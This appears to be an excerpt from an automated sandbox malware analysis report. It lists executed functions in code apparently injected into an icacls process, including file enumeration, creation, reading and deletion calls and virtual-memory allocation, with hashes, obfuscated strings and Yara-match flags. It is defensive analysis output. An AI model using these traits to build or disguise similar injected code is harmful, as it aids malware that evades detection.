96733 30db21b 96729->96733 96730 30db243 FindNextFileW 96732 30db255 FindClose 96730->96732 96730->96733 96732->96728 96733->96730 96734 30db040 NtClose 96733->96734 96734->96733 96735 30e67b0 96736 30e6837 96735->96736 96737 30e67d7 96735->96737 96740 3922ee0 LdrInitializeThunk 96736->96740 96738 30e6868 96740->96738 96746 30e7270 96747 30e72dc 96746->96747 96749 30e7294 96746->96749 96748 30e72f2 NtDeleteFile 96747->96748 96750 30e0470 96751 30e047f 96750->96751 96752 30e37b0 NtClose 96751->96752 96755 30e0498 96752->96755 96753 30e04c6 96754 30e91e0 RtlFreeHeap 96753->96754 96756 30e04d2 96754->96756 96755->96753 96757 30e0503 96755->96757 96759 30e0508 96755->96759 96758 30e91e0 RtlFreeHeap 96757->96758 96758->96759

                                                                                                        Executed Functions

                                                                                                        Function 030C90E0 Relevance: 29.2, Strings: 23, Instructions: 414COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 27 30c90e0-30c9439 28 30c9443-30c9453 27->28 28->28 29 30c9455-30c9466 28->29 30 30c9477-30c9483 29->30 31 30c949a-30c94a4 30->31 32 30c9485-30c9498 30->32 34 30c94b5-30c94c1 31->34 32->30 35 30c94d1-30c94db 34->35 36 30c94c3-30c94cf 34->36 38 30c94ec-30c94f8 35->38 36->34 39 30c94fa-30c9503 38->39 40 30c9510-30c951a 38->40 41 30c950e 39->41 42 30c9505-30c950b 39->42 43 30c952b-30c9537 40->43 41->38 42->41 45 30c9548-30c954f 43->45 46 30c9539-30c9546 43->46 48 30c9596-30c95a0 45->48 49 30c9551-30c9575 45->49 46->43 52 30c95b1-30c95ba 48->52 50 30c9577-30c957d 49->50 51 30c9580-30c9594 49->51 50->51 51->45 53 30c95bc-30c95c8 52->53 54 30c95ca-30c95d4 52->54 53->52 56 30c95e5-30c95f1 54->56 57 30c9604-30c9625 56->57 58 30c95f3-30c9602 56->58 60 30c9636-30c9640 57->60 58->56 61 30c9657 60->61 62 30c9642-30c9655 60->62 64 30c965e-30c9667 61->64 62->60 65 30c966d-30c9677 64->65 66 30c97e6-30c97ed 64->66 69 30c9688-30c9691 65->69 67 30c991e-30c9927 66->67 68 30c97f3-30c980c 66->68 68->68 70 30c980e-30c9818 68->70 71 30c96a1-30c96a4 69->71 72 30c9693-30c969f 69->72 75 30c9829-30c9835 70->75 74 30c96aa-30c96c3 71->74 72->69 74->74 76 30c96c5-30c96cf 74->76 77 30c9846-30c984d 75->77 78 30c9837-30c9844 75->78 79 30c96e0-30c96ec 76->79 81 30c984f-30c9860 77->81 82 30c9876 call 30e8e70 77->82 78->75 84 30c96ee-30c9701 79->84 85 30c9703-30c9712 79->85 86 30c9867-30c9869 81->86 87 30c9862-30c9866 81->87 88 30c987b-30c9884 82->88 84->79 90 30c977d-30c9783 85->90 91 30c9714-30c971b 85->91 92 30c986b-30c9871 86->92 93 30c9874 86->93 87->86 94 30c9886-30c989e 88->94 95 30c98a0-30c98a4 88->95 98 30c9799-30c97ad 90->98 99 30c9785-30c9797 90->99 96 30c975c-30c9760 91->96 97 30c971d-30c975a 91->97 92->93 93->77 94->88 100 30c98cd-30c98d4 95->100 101 30c98a6-30c98cb 95->101 102 30c977b 96->102 103 30c9762-30c9779 96->103 97->91 104 30c97be-30c97c7 98->104 99->90 107 30c98f9-30c98fd 100->107 108 30c98d6-30c98ec 100->108 101->95 102->66 103->96 105 30c97c9-30c97d5 104->105 106 30c97d7-30c97e1 104->106 105->104 106->64 107->67 112 30c98ff-30c991c 107->112 110 30c98ee-30c98f4 108->110 111 30c98f7 108->111 110->111 111->100 112->107
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: #$%y$'f$)$5-$>;$?m$KV$ND$UZ$c%$d$eZ$gv$l$n1$q$u$vR$w$$w%$wX$~b
                                                                                                        • API String ID: 0-185663158
                                                                                                        • Opcode ID: 93f1c7ec38ffda38eba93e3ac0d585a937fcea73f87ff4ca52344262cf58ff0b
                                                                                                        • Instruction ID: 4d7a2492498a1ec7931e780554dc5796d6764aa36fbfe526b9cefd3cd8b79673
                                                                                                        • Opcode Fuzzy Hash: 93f1c7ec38ffda38eba93e3ac0d585a937fcea73f87ff4ca52344262cf58ff0b
                                                                                                        • Instruction Fuzzy Hash: 2722B0B0D16268CBEB64CF85C994BDDBBB2BF45308F1081D9C0496B294DBB95A88CF51
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 030DB130 Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • FindFirstFileW.KERNELBASE(?,00000000), ref: 030DB211
                                                                                                        • FindNextFileW.KERNELBASE(?,00000010), ref: 030DB24E
                                                                                                        • FindClose.KERNELBASE(?), ref: 030DB259
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                                        • String ID:
                                                                                                        • API String ID: 3541575487-0
                                                                                                        • Opcode ID: 917f2ba48a8a32ea97d9baf93e7898b9139e8d856c35dc3dd7a89657b3fad8e9
                                                                                                        • Instruction ID: 4a641a73a5e39eebf20ebe090ee4ceadfad75467b550fb2e84d734f8f39d0c47
                                                                                                        • Opcode Fuzzy Hash: 917f2ba48a8a32ea97d9baf93e7898b9139e8d856c35dc3dd7a89657b3fad8e9
                                                                                                        • Instruction Fuzzy Hash: 0A3132B69013487FDB64DBA4CC85FFF77BC9B84705F144558B918AB180EB70AA848BA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 030E7020 Relevance: 1.6, APIs: 1, Instructions: 98filenativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 030E7116
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 823142352-0
                                                                                                        • Opcode ID: 8ff75ae15b831dec616d4ac597ad7e6ff3b0f25627c392ce083e0cb91ea6115d
                                                                                                        • Instruction ID: 4e34a6dc2642f4047e52cd261245a83bc58c856dee64636b336538f051be9d98
                                                                                                        • Opcode Fuzzy Hash: 8ff75ae15b831dec616d4ac597ad7e6ff3b0f25627c392ce083e0cb91ea6115d
                                                                                                        • Instruction Fuzzy Hash: 7931F7B5A11209AFCB14DF98D880EEFB7F9EF8C714F108619F918A7340D770A9518BA4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 030E7180 Relevance: 1.6, APIs: 1, Instructions: 90filenativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 030E725B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 2738559852-0
                                                                                                        • Opcode ID: 3b0e1b33901340b62b842e721e70fcf5a93d54b836b9d68e69a6224c9af8e663
                                                                                                        • Instruction ID: 7c7a2ed69582fdcd1a464ccca6f7568dfcbc553d012db7ce7af0e20eda2aa852
                                                                                                        • Opcode Fuzzy Hash: 3b0e1b33901340b62b842e721e70fcf5a93d54b836b9d68e69a6224c9af8e663
                                                                                                        • Instruction Fuzzy Hash: 7C311AB5A01209AFDB14DF98D840EEFB7B9EF8C714F008609FD18A7280D774A911CBA5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 030E7460 Relevance: 1.6, APIs: 1, Instructions: 78memorynativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • NtAllocateVirtualMemory.NTDLL(030D0D3B,?,030E6087,00000000,00000004,00003000,?,?,?,?,?,030E6087,030D0D3B,030DFAC1,030E6087,00000000), ref: 030E7520
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 2167126740-0
                                                                                                        • Opcode ID: 89f6f36a3592fc282b6a1e3404c1c74815f73935c7ab195cab08ff1d03aa4076
                                                                                                        • Instruction ID: 4fb96476e2779ecd19fc1bb79cc99e6be423d22056ebccd3b8bd8f2075e0d2a1
                                                                                                        • Opcode Fuzzy Hash: 89f6f36a3592fc282b6a1e3404c1c74815f73935c7ab195cab08ff1d03aa4076
                                                                                                        • Instruction Fuzzy Hash: E1211BB5A11209AFDB14DF68DC41FEFB7A9EF88710F408509FD18A7280D774A911CBA5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 030E7270 Relevance: 1.6, APIs: 1, Instructions: 58filenativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: DeleteFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 4033686569-0
                                                                                                        • Opcode ID: 67eeb970bbe66605b47678012e99ad5774d6d00bc3ed42f123f448935b982610
                                                                                                        • Instruction ID: d5e1c604d9d3ae9abe3076f2fa3126e6661b76a8cf55ad08d3b163ffdbd91ad3
                                                                                                        • Opcode Fuzzy Hash: 67eeb970bbe66605b47678012e99ad5774d6d00bc3ed42f123f448935b982610
                                                                                                        • Instruction Fuzzy Hash: D5015E79A513187FE624EAA8DC45FEB73ACDFC5610F404549FA186B180DBB0650087E5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 030E7310 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • NtClose.NTDLL(?,?,?,00000000,030D2538,?,030E012D,030D2538,494CA64B,?,?,?,?,?,?,030E3826), ref: 030E7347
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Close
                                                                                                        • String ID:
                                                                                                        • API String ID: 3535843008-0
                                                                                                        • Opcode ID: 8992f114be1ba2a05a1850425414e7bbbe9c44187a3c2aaee730293ab117c9aa
                                                                                                        • Instruction ID: 3356b09abb5187f384142a04ef21d0fe829489bc38be843426acfd54f8ee8f0a
                                                                                                        • Opcode Fuzzy Hash: 8992f114be1ba2a05a1850425414e7bbbe9c44187a3c2aaee730293ab117c9aa
                                                                                                        • Instruction Fuzzy Hash: C4E04F356003047BD510EB69DC41FDB776CDFC5B11F004519FA08AB181CAB0B91086F5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 03924340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 168ae7cc502e30552526a52d88b81f06d972a528c581d4ba35cc85c368027ae3
                                                                                                        • Instruction ID: 09cee1785f8ccc885a368b47ae4388bfc4f577d9844792e00ab7e393f50eca3b
                                                                                                        • Opcode Fuzzy Hash: 168ae7cc502e30552526a52d88b81f06d972a528c581d4ba35cc85c368027ae3
                                                                                                        • Instruction Fuzzy Hash: E290027560990412A140B1584888546405997E1301B55C011F042C554C8B148A5A6361
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 03924650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 47d32cb0defc8f01772113a8c07586571ec000855250ee86b666db927b57e8dd
                                                                                                        • Instruction ID: b3495f9c2f4ed5902475f6a0b97b154706e0879e85bae3f2c93e0f027a0f1a5e
                                                                                                        • Opcode Fuzzy Hash: 47d32cb0defc8f01772113a8c07586571ec000855250ee86b666db927b57e8dd
                                                                                                        • Instruction Fuzzy Hash: 419002A5605604425140B1584808406605997E2301395C115B055C560C87188959A269
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 03922BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 0e707f0c2e6b059b22f8b6d5687c986b7b5c123c789b2644a2854dfa5eaf9a88
                                                                                                        • Instruction ID: c62654c3f01e711269a331ff6c2bc742ed1dbbe27b03734b0486581a6b60f8af
                                                                                                        • Opcode Fuzzy Hash: 0e707f0c2e6b059b22f8b6d5687c986b7b5c123c789b2644a2854dfa5eaf9a88
                                                                                                        • Instruction Fuzzy Hash: 8290027560950C02E150B1584418746005987D1301F55C011B002C654D87558B5976A1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 03922BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: c54a742fc73fb7066cf6821aeb1eb15da74465c48cd18725a9bbb27cddf0f14d
                                                                                                        • Instruction ID: 76aef941f98af5bd60b2524110f68c15579a70b46ee86c76d3757e95413e9f18
                                                                                                        • Opcode Fuzzy Hash: c54a742fc73fb7066cf6821aeb1eb15da74465c48cd18725a9bbb27cddf0f14d
                                                                                                        • Instruction Fuzzy Hash: FE90027520550C02E180B158440864A005987D2301F95C015B002D654DCB158B5D77A1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 03922BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 2dd4d6cd6a1b10d3d1a7b81ad6617f171221497fd37c9dc43f7375a782da1340
                                                                                                        • Instruction ID: 0e340211fb13060d6b9410810eccb0f730447b66325ce97ec8456e2dba413f93
                                                                                                        • Opcode Fuzzy Hash: 2dd4d6cd6a1b10d3d1a7b81ad6617f171221497fd37c9dc43f7375a782da1340
                                                                                                        • Instruction Fuzzy Hash: BA90027520954C42E140B1584408A46006987D1305F55C011B006C694D97258E59B661
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 03922B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: d5afe4b9df5b23df10ee4894e9db889721689e3eeaf55659ebd1d82a524b3487
                                                                                                        • Instruction ID: 0ecc10c72318d5352bb41bb8929244413391cc637bc4d5c1739f335882bb7942
                                                                                                        • Opcode Fuzzy Hash: d5afe4b9df5b23df10ee4894e9db889721689e3eeaf55659ebd1d82a524b3487
                                                                                                        • Instruction Fuzzy Hash: B59002A5206504035105B1584418616405E87E1201B55C021F101C590DC62589957125
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 03922AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 9a7a023e102e55d42e0546a1e211594f6fc613ceb7da60b3eb7d3af70d72b96f
                                                                                                        • Instruction ID: 31b23b41098db73c19f358371cf3faa808d19542fd317a335213742f25374808
                                                                                                        • Opcode Fuzzy Hash: 9a7a023e102e55d42e0546a1e211594f6fc613ceb7da60b3eb7d3af70d72b96f
                                                                                                        • Instruction Fuzzy Hash: 41900269215504031105F5580708507009A87D6351355C021F101D550CD72189656121
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 03922AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 5fac10d75a0dba70f2a8aed8603bcaa36b792721bd4946da0a2d699e24654a8e
                                                                                                        • Instruction ID: 3164c46410b2a60e497cbd89b496c413c9b9ed0f4d4002a36acb0f225a90fb4b
                                                                                                        • Opcode Fuzzy Hash: 5fac10d75a0dba70f2a8aed8603bcaa36b792721bd4946da0a2d699e24654a8e
                                                                                                        • Instruction Fuzzy Hash: FC900269225504021145F558060850B049997D7351395C015F141E590CC72189696321
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 03922FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 4fbdc1f098482d9e1a1581892df2050c21b32ec521e39468af92cdf1cae3c548
                                                                                                        • Instruction ID: a5cc2f321dd805c1bf5db5654ab3c57c68ad611f172ef8ddc2a25c41a6f63555
                                                                                                        • Opcode Fuzzy Hash: 4fbdc1f098482d9e1a1581892df2050c21b32ec521e39468af92cdf1cae3c548
                                                                                                        • Instruction Fuzzy Hash: 74900265605504425140B16888489064059ABE2211755C121B099C550D865989696665
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 03922FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: f024e45e50a5e4f3447e70c91a9838d180cafe6f0d74733a78209c82c1efd1da
                                                                                                        • Instruction ID: 427df0ab31bf49116e3160ec026149f4d9aab3f81543aec3c17c91aa334288e9
                                                                                                        • Opcode Fuzzy Hash: f024e45e50a5e4f3447e70c91a9838d180cafe6f0d74733a78209c82c1efd1da
                                                                                                        • Instruction Fuzzy Hash: 3D900265215D0442E200B5684C18B07005987D1303F55C115B015C554CCA1589656521
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 03922F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 6ae5bd837d81f93fceddf0d8596854a8fa99eb2eb01f2cd6c71595b103288481
                                                                                                        • Instruction ID: 0ea832682cd932623c5bf9a711f4be10bb2e1e0daa5b6f7a29986da9af5ddf77
                                                                                                        • Opcode Fuzzy Hash: 6ae5bd837d81f93fceddf0d8596854a8fa99eb2eb01f2cd6c71595b103288481
                                                                                                        • Instruction Fuzzy Hash: 749002A534550842E100B1584418B060059C7E2301F55C015F106C554D8719CD567126
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 03922E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
